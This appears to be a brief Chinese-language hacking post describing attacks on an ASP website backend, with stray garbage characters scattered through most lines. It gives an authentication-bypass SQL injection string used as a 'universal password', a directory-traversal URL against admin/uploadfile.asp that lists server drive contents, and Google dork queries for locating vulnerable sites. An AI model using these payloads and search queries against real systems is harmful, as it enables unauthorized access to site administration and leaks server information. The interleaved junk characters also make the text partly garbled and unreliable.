后台万能密码 'or'='or'9 O! i# G4 l- f1 D- @$ M- |
4 l3 N) B1 A: r% J- g Z
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!/ \1 P0 G3 J# @, Q
admin/uploadfile.asp?currentFolder=/upfiles/../" d) p& K- k A' u1 R6 f& y
4 ?* `; f! l$ K& j漏洞证明:
6 w2 R5 @% Z8 R, V2 J# R, s% w6 Y% Q% m) R' @6 m5 b I
谷歌:inurl:type.asp?id=1 新闻中心6 `8 ~# U* y h$ C$ y; L
或者 :inurl:download_ok.asp?- m8 X" s- Q, P( q% C% h4 i
5 k2 v: p8 f6 ~
|